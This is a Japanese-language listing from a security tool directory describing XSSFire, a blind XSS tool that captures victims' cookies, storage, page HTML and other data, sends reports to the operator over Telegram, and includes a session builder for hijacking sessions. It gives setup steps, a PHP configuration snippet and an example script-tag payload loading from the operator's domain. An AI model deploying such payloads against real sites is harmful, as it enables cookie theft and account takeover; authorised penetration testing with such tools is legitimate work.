Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/seifelsallamy/xssfire
エクスプロイトウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテスト
GitHubseifelsallamy/xssfire

XSSFire

スタンドアロンのBlind XSSスクリプト。

リポジトリを見る
471041年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

XSSFire

スタンドアロンのBlind XSSスクリプトです。

仕組み:

このスクリプトはPHPとJavaScriptの組み合わせです。JSを使ってデータをキャプチャし、スクリプト自身に送信します。その後、レポートファイルを生成し、Telegramを通じて配信します。

要件:

  1. ドメインとSSL証明書を備えたLinux上で動作するWebサーバー。
  2. Telegramアカウント(BXSSレポートを受け取るため)

なぜTelegramなのか?

セットアップが簡単。 高速。 アクセスしやすい。

特徴:

  1. キャプチャ対象: IP、User-Agent、日時、Local Storage、Session Storage、Cookies、Referrer、Origin、URL、HTML、Iframeから発火した場合
  2. セッションビルダー: セッションを再構築できるJavaScriptです。キャプチャしたURLを開いてdevtoolsを起動し、コンソールに貼り付けてEnterキーを押します。運が良ければセッションを乗っ取ることができます。
  3. Telegram通知: メールよりも速く簡単にセットアップでき、より確実に届きます。
  4. アンチスパム: キャプチャしたURLごとに通知は1件か2件しか受け取りません。ただし、スクリプトは時々リセットされ、後日再度通知します。
  5. 暗号化: スクリプトにパスワードを設定できます。Telegramで受け取るレポートはパスワードで保護されたzipファイルになります。(Telegramボットはエンドツーエンド暗号化を使用していません)
  6. HTMLスナップショット: レポートと一緒に配信されるHTMLファイルです。対象のページと似た外観になります。

セットアップ:

  1. Telegramにアクセスし、@botfatherとチャットします。
  2. チャットで /start と入力し、新しいボットを作成します。
  3. 作成時にボットトークンが取得できます。
  4. トークンを保管しておきます。
  5. 次に、作成したボットのチャットを開いて起動し、挨拶を送ります。
  6. 次に、https://api.telegram.org/bot<bot_token>/getUpdates にアクセスします。
  7. チャットIDを保存します。
  8. XSSFireスクリプトを開き、以下の行を変更します。
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
  1. スクリプトをサーバーにアップロードします。

ペイロードを生成するには、Blind-XSS-Manager の使用を検討してください。 https://github.com/SeifElsallamy/Blind-XSS-Manager この拡張機能では、ドメイン欄に yourdomain.com/

注記: ファイル名を index.php に変更してサーバーのメインディレクトリにアップロードすると、ペイロードを短くできます。その場合、ペイロードは次のような形になります: <script src="https://yourdomain.com"></script>。

スナップショット:

bxss bxss2 bxss3

GPT-3に感謝 xD

ツールをダウンロード